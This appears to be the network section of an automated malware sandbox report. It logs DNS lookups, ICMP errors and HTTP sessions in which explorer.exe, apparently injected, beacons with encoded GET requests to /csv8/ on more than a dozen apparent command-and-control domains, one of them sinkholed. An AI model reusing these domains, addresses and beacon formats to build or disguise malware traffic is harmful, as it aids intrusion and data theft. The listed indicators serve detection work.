Jan 13, 2021 21:04:26.231012106 CET  56132        53         192.168.2.3      8.8.8.8
Jan 13, 2021 21:04:26.644450903 CET  58987        53         192.168.2.3      8.8.8.8
Jan 13, 2021 21:04:26.702014923 CET  53           58987      8.8.8.8          192.168.2.3
Jan 13, 2021 21:04:27.245870113 CET  56132        53         192.168.2.3      8.8.8.8
Jan 13, 2021 21:04:28.032321930 CET  53           56132      8.8.8.8          192.168.2.3
Jan 13, 2021 21:04:29.053430080 CET  53           56132      8.8.8.8          192.168.2.3
Jan 13, 2021 21:04:33.048207998 CET  56579        53         192.168.2.3      8.8.8.8
Jan 13, 2021 21:04:33.252438068 CET  53           56579      8.8.8.8          192.168.2.3
Jan 13, 2021 21:04:36.666981936 CET  60633        53         192.168.2.3      8.8.8.8
Jan 13, 2021 21:04:36.794030905 CET  53           60633      8.8.8.8          192.168.2.3
Jan 13, 2021 21:04:37.342623949 CET  61292        53         192.168.2.3      8.8.8.8
Jan 13, 2021 21:04:37.422462940 CET  53           61292      8.8.8.8          192.168.2.3
Jan 13, 2021 21:04:37.988605022 CET  63619        53         192.168.2.3      8.8.8.8
Jan 13, 2021 21:04:38.044975042 CET  53           63619      8.8.8.8          192.168.2.3
Jan 13, 2021 21:04:38.510776043 CET  64938        53         192.168.2.3      8.8.8.8
Jan 13, 2021 21:04:38.567425966 CET  53           64938      8.8.8.8          192.168.2.3
Jan 13, 2021 21:04:38.657728910 CET  61946        53         192.168.2.3      8.8.8.8
Jan 13, 2021 21:04:39.050699949 CET  53           61946      8.8.8.8          192.168.2.3
Jan 13, 2021 21:04:39.057087898 CET  64910        53         192.168.2.3      8.8.8.8
Jan 13, 2021 21:04:39.113562107 CET  53           64910      8.8.8.8          192.168.2.3
Jan 13, 2021 21:04:39.671612024 CET  52123        53         192.168.2.3      8.8.8.8
Jan 13, 2021 21:04:39.731230974 CET  53           52123      8.8.8.8          192.168.2.3
Jan 13, 2021 21:04:40.546530008 CET  56130        53         192.168.2.3      8.8.8.8
Jan 13, 2021 21:04:40.605827093 CET  53           56130      8.8.8.8          192.168.2.3
Jan 13, 2021 21:04:40.704773903 CET  56338        53         192.168.2.3      8.8.8.8
Jan 13, 2021 21:04:40.768801928 CET  53           56338      8.8.8.8          192.168.2.3
Jan 13, 2021 21:04:41.428122997 CET  59420        53         192.168.2.3      8.8.8.8
Jan 13, 2021 21:04:41.484390974 CET  53           59420      8.8.8.8          192.168.2.3
Jan 13, 2021 21:04:43.052429914 CET  58784        53         192.168.2.3      8.8.8.8
Jan 13, 2021 21:04:43.100449085 CET  53           58784      8.8.8.8          192.168.2.3
Jan 13, 2021 21:04:43.597229958 CET  63978        53         192.168.2.3      8.8.8.8
Jan 13, 2021 21:04:43.653685093 CET  53           63978      8.8.8.8          192.168.2.3
                                                                            Jan 13, 2021 21:04:44.082952976 CET6293853192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:04:44.243922949 CET53629388.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:04:49.551908016 CET5570853192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:04:49.624840021 CET53557088.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:04:54.751828909 CET5680353192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:04:54.836445093 CET53568038.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:04:59.489957094 CET5714553192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:04:59.546482086 CET53571458.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:05:00.530175924 CET5535953192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:05:00.592801094 CET53553598.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:05:05.785716057 CET5830653192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:05:05.850408077 CET53583068.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:05:10.945827961 CET6412453192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:05:11.003951073 CET53641248.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:05:21.233468056 CET4936153192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:05:21.578461885 CET53493618.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:05:24.494661093 CET6315053192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:05:25.204083920 CET5327953192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:05:25.255053043 CET53532798.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:05:25.516793013 CET6315053192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:05:25.564650059 CET53631508.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:05:27.478451014 CET5688153192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:05:27.704834938 CET53568818.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:05:33.115914106 CET5364253192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:05:33.178495884 CET53536428.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:05:38.215327024 CET5566753192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:05:38.447403908 CET53556678.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:05:43.839272976 CET5483353192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:05:44.220861912 CET53548338.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:05:49.944683075 CET6247653192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:05:50.007997036 CET53624768.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:05:55.316931963 CET4970553192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:05:56.331440926 CET4970553192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:05:57.347142935 CET4970553192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:05:57.374772072 CET53497058.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:05:58.107872963 CET53497058.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:05:59.126219034 CET53497058.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:06:07.773875952 CET6147753192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:06:07.833264112 CET53614778.8.8.8192.168.2.3

ICMP Packets

Timestamp | Source IP | Dest IP | Checksum | Code | Type
Jan 13, 2021 21:04:29.053590059 CET | 192.168.2.3 | 8.8.8.8 | cff4 | (Port unreachable) | Destination Unreachable
Jan 13, 2021 21:05:58.107974052 CET | 192.168.2.3 | 8.8.8.8 | cff4 | (Port unreachable) | Destination Unreachable
Jan 13, 2021 21:05:59.126867056 CET | 192.168.2.3 | 8.8.8.8 | cff4 | (Port unreachable) | Destination Unreachable

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 13, 2021 21:04:26.231012106 CET | 192.168.2.3 | 8.8.8.8 | 0x918b | Standard query (0) | www.herbmedia.net | A (IP address) | IN (0x0001)
Jan 13, 2021 21:04:27.245870113 CET | 192.168.2.3 | 8.8.8.8 | 0x918b | Standard query (0) | www.herbmedia.net | A (IP address) | IN (0x0001)
Jan 13, 2021 21:04:33.048207998 CET | 192.168.2.3 | 8.8.8.8 | 0x42a0 | Standard query (0) | www.travelnetafrica.com | A (IP address) | IN (0x0001)
Jan 13, 2021 21:04:38.657728910 CET | 192.168.2.3 | 8.8.8.8 | 0x8c8c | Standard query (0) | www.latin-hotspot.com | A (IP address) | IN (0x0001)
Jan 13, 2021 21:04:44.082952976 CET | 192.168.2.3 | 8.8.8.8 | 0xdaa8 | Standard query (0) | www.procreditexpert.com | A (IP address) | IN (0x0001)
Jan 13, 2021 21:04:49.551908016 CET | 192.168.2.3 | 8.8.8.8 | 0x396c | Standard query (0) | www.fessusesefsee.com | A (IP address) | IN (0x0001)
Jan 13, 2021 21:04:54.751828909 CET | 192.168.2.3 | 8.8.8.8 | 0x6415 | Standard query (0) | www.queensboutique1000.com | A (IP address) | IN (0x0001)
Jan 13, 2021 21:05:00.530175924 CET | 192.168.2.3 | 8.8.8.8 | 0xb972 | Standard query (0) | www.studentdividers.com | A (IP address) | IN (0x0001)
Jan 13, 2021 21:05:05.785716057 CET | 192.168.2.3 | 8.8.8.8 | 0x8969 | Standard query (0) | www.logansshop.net | A (IP address) | IN (0x0001)
Jan 13, 2021 21:05:10.945827961 CET | 192.168.2.3 | 8.8.8.8 | 0xdc07 | Standard query (0) | www.epicmassiveconcepts.com | A (IP address) | IN (0x0001)
Jan 13, 2021 21:05:21.233468056 CET | 192.168.2.3 | 8.8.8.8 | 0xc400 | Standard query (0) | www.exit-divorce.com | A (IP address) | IN (0x0001)
Jan 13, 2021 21:05:27.478451014 CET | 192.168.2.3 | 8.8.8.8 | 0x52c6 | Standard query (0) | www.splendidhotelspa.com | A (IP address) | IN (0x0001)
Jan 13, 2021 21:05:33.115914106 CET | 192.168.2.3 | 8.8.8.8 | 0xb023 | Standard query (0) | www.thesouthbeachlife.com | A (IP address) | IN (0x0001)
Jan 13, 2021 21:05:38.215327024 CET | 192.168.2.3 | 8.8.8.8 | 0x4d47 | Standard query (0) | www.stnanguo.com | A (IP address) | IN (0x0001)
Jan 13, 2021 21:05:43.839272976 CET | 192.168.2.3 | 8.8.8.8 | 0xfccc | Standard query (0) | www.alparmuhendislik.com | A (IP address) | IN (0x0001)
Jan 13, 2021 21:05:49.944683075 CET | 192.168.2.3 | 8.8.8.8 | 0x7b79 | Standard query (0) | www.soundon.events | A (IP address) | IN (0x0001)
Jan 13, 2021 21:05:55.316931963 CET | 192.168.2.3 | 8.8.8.8 | 0x8d54 | Standard query (0) | www.herbmedia.net | A (IP address) | IN (0x0001)
Jan 13, 2021 21:05:56.331440926 CET | 192.168.2.3 | 8.8.8.8 | 0x8d54 | Standard query (0) | www.herbmedia.net | A (IP address) | IN (0x0001)
Jan 13, 2021 21:05:57.347142935 CET | 192.168.2.3 | 8.8.8.8 | 0x8d54 | Standard query (0) | www.herbmedia.net | A (IP address) | IN (0x0001)
Jan 13, 2021 21:06:07.773875952 CET | 192.168.2.3 | 8.8.8.8 | 0x93cd | Standard query (0) | www.latin-hotspot.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 13, 2021 21:04:28.032321930 CET | 8.8.8.8 | 192.168.2.3 | 0x918b | Server failure (2) | www.herbmedia.net | none | none | A (IP address) | IN (0x0001)
Jan 13, 2021 21:04:29.053430080 CET | 8.8.8.8 | 192.168.2.3 | 0x918b | Server failure (2) | www.herbmedia.net | none | none | A (IP address) | IN (0x0001)
Jan 13, 2021 21:04:33.252438068 CET | 8.8.8.8 | 192.168.2.3 | 0x42a0 | No error (0) | www.travelnetafrica.com |  | 173.234.175.134 | A (IP address) | IN (0x0001)
Jan 13, 2021 21:04:44.243922949 CET | 8.8.8.8 | 192.168.2.3 | 0xdaa8 | No error (0) | www.procreditexpert.com | us20-d42e32e7-5da32c142596003de06ec4b5a.pages.mailchi.mp |  | CNAME (Canonical name) | IN (0x0001)
Jan 13, 2021 21:04:44.243922949 CET | 8.8.8.8 | 192.168.2.3 | 0xdaa8 | No error (0) | us20-d42e32e7-5da32c142596003de06ec4b5a.pages.mailchi.mp | terminator.capstone.com.akadns.net |  | CNAME (Canonical name) | IN (0x0001)
Jan 13, 2021 21:04:49.624840021 CET | 8.8.8.8 | 192.168.2.3 | 0x396c | No error (0) | www.fessusesefsee.com |  | 45.77.226.209 | A (IP address) | IN (0x0001)
Jan 13, 2021 21:04:54.836445093 CET | 8.8.8.8 | 192.168.2.3 | 0x6415 | No error (0) | www.queensboutique1000.com | queensboutique1000.com |  | CNAME (Canonical name) | IN (0x0001)
Jan 13, 2021 21:04:54.836445093 CET | 8.8.8.8 | 192.168.2.3 | 0x6415 | No error (0) | queensboutique1000.com |  | 142.44.212.169 | A (IP address) | IN (0x0001)
Jan 13, 2021 21:05:00.592801094 CET | 8.8.8.8 | 192.168.2.3 | 0xb972 | No error (0) | www.studentdividers.com | studentdividers.com |  | CNAME (Canonical name) | IN (0x0001)
Jan 13, 2021 21:05:00.592801094 CET | 8.8.8.8 | 192.168.2.3 | 0xb972 | No error (0) | studentdividers.com |  | 34.102.136.180 | A (IP address) | IN (0x0001)
Jan 13, 2021 21:05:05.850408077 CET | 8.8.8.8 | 192.168.2.3 | 0x8969 | No error (0) | www.logansshop.net | logansshop.net |  | CNAME (Canonical name) | IN (0x0001)
Jan 13, 2021 21:05:05.850408077 CET | 8.8.8.8 | 192.168.2.3 | 0x8969 | No error (0) | logansshop.net |  | 192.0.78.208 | A (IP address) | IN (0x0001)
Jan 13, 2021 21:05:05.850408077 CET | 8.8.8.8 | 192.168.2.3 | 0x8969 | No error (0) | logansshop.net |  | 192.0.78.138 | A (IP address) | IN (0x0001)
Jan 13, 2021 21:05:11.003951073 CET | 8.8.8.8 | 192.168.2.3 | 0xdc07 | No error (0) | www.epicmassiveconcepts.com | epicmassiveconcepts.com |  | CNAME (Canonical name) | IN (0x0001)
Jan 13, 2021 21:05:11.003951073 CET | 8.8.8.8 | 192.168.2.3 | 0xdc07 | No error (0) | epicmassiveconcepts.com |  | 34.102.136.180 | A (IP address) | IN (0x0001)
Jan 13, 2021 21:05:21.578461885 CET | 8.8.8.8 | 192.168.2.3 | 0xc400 | No error (0) | www.exit-divorce.com |  | 192.155.166.181 | A (IP address) | IN (0x0001)
Jan 13, 2021 21:05:27.704834938 CET | 8.8.8.8 | 192.168.2.3 | 0x52c6 | No error (0) | www.splendidhotelspa.com | splendidhotelspa.com |  | CNAME (Canonical name) | IN (0x0001)
Jan 13, 2021 21:05:27.704834938 CET | 8.8.8.8 | 192.168.2.3 | 0x52c6 | No error (0) | splendidhotelspa.com |  | 205.134.254.189 | A (IP address) | IN (0x0001)
Jan 13, 2021 21:05:33.178495884 CET | 8.8.8.8 | 192.168.2.3 | 0xb023 | Name error (3) | www.thesouthbeachlife.com | none | none | A (IP address) | IN (0x0001)
Jan 13, 2021 21:05:38.447403908 CET | 8.8.8.8 | 192.168.2.3 | 0x4d47 | No error (0) | www.stnanguo.com |  | 146.148.193.212 | A (IP address) | IN (0x0001)
Jan 13, 2021 21:05:44.220861912 CET | 8.8.8.8 | 192.168.2.3 | 0xfccc | No error (0) | www.alparmuhendislik.com |  | 23.105.124.225 | A (IP address) | IN (0x0001)
Jan 13, 2021 21:05:50.007997036 CET | 8.8.8.8 | 192.168.2.3 | 0x7b79 | No error (0) | www.soundon.events | ext-cust.squarespace.com |  | CNAME (Canonical name) | IN (0x0001)
Jan 13, 2021 21:05:50.007997036 CET | 8.8.8.8 | 192.168.2.3 | 0x7b79 | No error (0) | ext-cust.squarespace.com |  | 198.49.23.144 | A (IP address) | IN (0x0001)
Jan 13, 2021 21:05:50.007997036 CET | 8.8.8.8 | 192.168.2.3 | 0x7b79 | No error (0) | ext-cust.squarespace.com |  | 198.185.159.145 | A (IP address) | IN (0x0001)
Jan 13, 2021 21:05:57.374772072 CET | 8.8.8.8 | 192.168.2.3 | 0x8d54 | Server failure (2) | www.herbmedia.net | none | none | A (IP address) | IN (0x0001)
Jan 13, 2021 21:05:58.107872963 CET | 8.8.8.8 | 192.168.2.3 | 0x8d54 | Server failure (2) | www.herbmedia.net | none | none | A (IP address) | IN (0x0001)
Jan 13, 2021 21:05:59.126219034 CET | 8.8.8.8 | 192.168.2.3 | 0x8d54 | Server failure (2) | www.herbmedia.net | none | none | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• www.travelnetafrica.com
• www.fessusesefsee.com
• www.queensboutique1000.com
• www.studentdividers.com
• www.logansshop.net
• www.epicmassiveconcepts.com
• www.exit-divorce.com
• www.splendidhotelspa.com
• www.stnanguo.com
• www.alparmuhendislik.com
• www.soundon.events

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49742 | 173.234.175.134 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jan 13, 2021 21:04:33.449708939 CET | 6475 | OUT | GET /csv8/?t8o8sPp=EQmgoSYDEa5LDPvVC5k82JbrO8g/Lv/s9cEF36fL7P4v8Aj5jRO5aZQhqVXoXMO5wnpv&jBZd=KnhT HTTP/1.1
Host: www.travelnetafrica.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jan 13, 2021 21:04:33.642399073 CET | 6476 | IN | HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: GET, POST
Date: Wed, 13 Jan 2021 20:04:32 GMT
Connection: close
Content-Length: 4298
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e e5 80 bc e4 b8 8d e8 83 bd e4 b8 ba 20 6e 75 6c 6c e3 80 82 3c 62 72 3e e5 8f 82 e6 95 b0 e5 90 8d 3a 20 69 6e 70 75 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 2e 37 65 6d 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 0d 0a 20 20 20 20 20 20 20 20 20 70 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 35 70 78 7d 0d 0a 20 20 20 20 20 20 20 20 20 62 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 35 70 78 7d 0d 0a 20 20 20 20 20 20 20 20 20 48 31 20 7b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 74 3b 63 6f 6c 6f 72 3a 72 65 64 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 48 32 20 7b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 74 3b 63 6f 6c 6f 72 3a 6d 61 72 6f 6f 6e 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 70 72 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 43 6f 6e 73 6f 6c 
61 73 22 2c 22 4c 75 63 69 64 61 20 43 6f 6e 73 6f 6c 65 22 2c 4d 6f 6e 6f 73 70 61 63 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 74 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 2e 35 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 34 70 74 7d 0d 0a 20 20 20 20 20 20 20 20 20 2e 6d 61 72 6b 65 72 20 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 7d 0d 0a 20 20 20 20 20 20 20 20 20 2e 76 65 72 73 69 6f 6e 20 7b 63 6f 6c 6f 72 3a 20 67 72 61 79 3b 7d 0d 0a 20 20 20 20 20 20 20 20 20 2e 65 72 72 6f 72 20 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 7d 0d 0a 20 20 20 20 20 20 20 20 20 2e 65 78 70 61 6e 64 61 62 6c 65 20 7b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 20 63 6f 6c 6f 72 3a 6e 61 76 79 3b 20 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 20 7d 0d
                                                                            Data Ascii: <!DOCTYPE html><html> <head> <title> null<br>: input</title> <meta name="viewport" content="width=device-width" /> <style> body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px} b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px} H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red } H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon } pre {font-family:"Consolas","Lucida Console",Monospace;font-size:11pt;margin:0;padding:0.5em;line-height:14pt} .marker {font-weight: bold; color: black;text-decoration: none;} .version {color: gray;} .error {margin-bottom: 10px;} .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:pointer; }


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49755 | 45.77.226.209 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jan 13, 2021 21:04:49.690268040 CET | 9647 | OUT | GET /csv8/?t8o8sPp=+aP4wUbNbXNo+DXgxdcGOO7le47nUjGI8O93VpAmlXcOKCIjUH4+hXL6+b4dsCsJZjty&jBZd=KnhT HTTP/1.1
Host: www.fessusesefsee.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jan 13, 2021 21:04:49.742832899 CET | 9648 | IN | HTTP/1.1 404 Not Found
Date: Wed, 13 Jan 2021 20:16:25 GMT
Server: X-SinkHole: Malware DNS SinkHole Server
Content-Length: 307
Connection: close
Content-Type: text/html; charset=iso-8859-1
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 73 76 38 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 58 2d 53 69 6e 6b 48 6f 6c 65 3a 20 4d 61 6c 77 61 72 65 20 44 4e 53 20 53 69 6e 6b 48 6f 6c 65 20 53 65 72 76 65 72 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 66 65 73 73 75 73 65 73 65 66 73 65 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /csv8/ was not found on this server.</p><hr><address>X-SinkHole: Malware DNS SinkHole Server Server at www.fessusesefsee.com Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.2.3 | 49768 | 198.49.23.144 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jan 13, 2021 21:05:50.138555050 CET | 9995 | OUT | GET /csv8/?t8o8sPp=f1zFyjNxEhLridJwdKKCz7YQnzvARTiViSvHXssl+N40gmlvXkDdEguhFCZDVR0rFwZR&jBZd=KnhT HTTP/1.1
Host: www.soundon.events
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jan 13, 2021 21:05:50.268177986 CET | 9996 | IN | HTTP/1.1 400 Bad Request
Cache-Control: no-cache, must-revalidate
Content-Length: 77564
Content-Type: text/html; charset=UTF-8
Date: Wed, 13 Jan 2021 20:05:50 UTC
Expires: Thu, 01 Jan 1970 00:00:00 UTC
Pragma: no-cache
Server: Squarespace
X-Contextid: evn59O79/p8IFMy6X
Connection: close
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 
